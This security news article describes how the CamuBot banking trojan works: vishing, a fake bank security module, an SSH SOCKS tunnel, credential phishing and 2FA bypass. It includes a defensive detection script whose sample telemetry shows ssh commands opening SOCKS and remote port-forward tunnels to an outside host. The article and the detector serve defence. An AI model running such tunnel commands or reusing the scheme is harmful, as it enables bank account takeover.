CamuBot Banking Trojan Uses Social Engineering to Hide in Plain Sight

IBM X-Force experts have discovered a new banking trojan called CamuBot, which first appeared last month in Brazil and stands out from most similar threats. CamuBot targets a wide range of companies and government organizations, but the main “weapon” used by attackers is social engineering. The malware authors disguise their trojan as a legitimate bank security application and pose as bank employees. As a result, victims end up installing the trojan themselves, following step-by-step instructions given over the phone by a live operator.

How CamuBot Attacks Work

According to IBM X-Force analysts, the criminals carefully prepare for each attack. They identify companies and organizations that do business with a specific financial institution and customize the malware with the appropriate branding and logos.

The attackers then call the targeted company, reaching out to an employee who is most likely to have access to the corporate banking account credentials. Pretending to be representatives of the company’s bank, the criminals ask the victim to follow a link and check the status of a supposed bank security module. The website, which is carefully crafted to look legitimate, informs the victim that the security software needs to be urgently updated. If the victim falls for the scam and downloads the supposed update, which asks for administrator privileges to install, what they actually install is the CamuBot trojan.

Technical Details and Social Engineering

Still masquerading as a bank security module, the trojan adds itself to the list of trusted applications in Windows Firewall, installs a SOCKS proxy (via SSH), and enables port forwarding. This two-way tunnel allows the attackers to use the victim’s IP address when accessing the company’s bank account.
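A defender-side triage of the two behaviours described above (a Windows Firewall allow entry for the "security module" plus an SSH SOCKS/port-forwarding tunnel), added here as an example and not taken from the IBM X-Force report. The telemetry records, paths and addresses are constructed, and the `-D`/`-R`/`-L` switches are standard OpenSSH client options, not a claim about the exact client CamuBot ships.

```python
import re

# Constructed sample telemetry, not data from the IBM X-Force report: process
# creations and Windows Firewall "allow" rules as an EDR/SIEM might normalise them.
PROCESS_EVENTS = [
    {"pid": 4120, "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": r"ssh.exe -N -D 1080 -R 2222:127.0.0.1:22 svc@198.51.100.20"},
    {"pid": 4133, "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": r"ssh.exe admin@fileserver.corp.example"},
    {"pid": 4150, "image": r"C:\Users\clerk\AppData\Local\Temp\secmodule\ssh.exe",
     "cmdline": r"ssh.exe -o StrictHostKeyChecking=no -R 9050 tun@198.51.100.20"},
]
FIREWALL_RULES = [
    {"name": "Core Networking - DNS (UDP-Out)", "action": "Allow",
     "program": r"C:\Windows\System32\svchost.exe"},
    {"name": "Bank Security Module", "action": "Allow",
     "program": r"C:\Users\clerk\AppData\Local\Temp\secmodule\ssh.exe"},
]

# ssh(1) tunnel switches: -D dynamic (SOCKS) forward, -R remote forward, -L local forward.
TUNNEL_FLAG = re.compile(r"(?:^|\s)-(D|R|L)\s*(\S+)")
# Directories an ordinary user can write to; a "bank security module" living here is suspect.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\(AppData|Downloads)\\|\\Temp\\", re.IGNORECASE)

def flag_tunnel_processes(events):
    """Return (pid, reason) for processes that open SSH SOCKS or port-forwarding tunnels."""
    findings = []
    for ev in events:
        flags = TUNNEL_FLAG.findall(ev["cmdline"])
        if not flags:
            continue
        reasons = [f"-{flag} {arg}" for flag, arg in flags]
        if USER_WRITABLE.search(ev["image"]):
            reasons.append("ssh client launched from user-writable path")
        findings.append((ev["pid"], "; ".join(reasons)))
    return findings

def flag_firewall_rules(rules):
    """Return names of allow rules whose program lives in a user-writable directory."""
    return [r["name"] for r in rules
            if r["action"].lower() == "allow" and USER_WRITABLE.search(r["program"])]

if __name__ == "__main__":
    for pid, why in flag_tunnel_processes(PROCESS_EVENTS):
        print(f"pid {pid}: SSH tunnel: {why}")
    for name in flag_firewall_rules(FIREWALL_RULES):
        print(f"firewall allow rule '{name}' points at a user-writable program")
```

The interactive admin session (pid 4133) is left alone; only dynamic or remote forwards, and allow rules pointing into user-writable directories, are raised for review.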

The criminals also obtain banking credentials through social engineering. After installation, CamuBot opens a fake bank website and prompts the user to log in, sending this information directly to the attackers.

Bypassing Two-Factor Authentication

IBM X-Force experts emphasize that the developers of CamuBot and this sophisticated attack scheme have even accounted for the possibility of encountering two-factor authentication (2FA). If the bank account is additionally protected by 2FA or biometrics, the malware can install the necessary drivers for the authentication device. The operator then asks the victim over the phone to provide the temporary code or grant remote access to the fake bank employee.
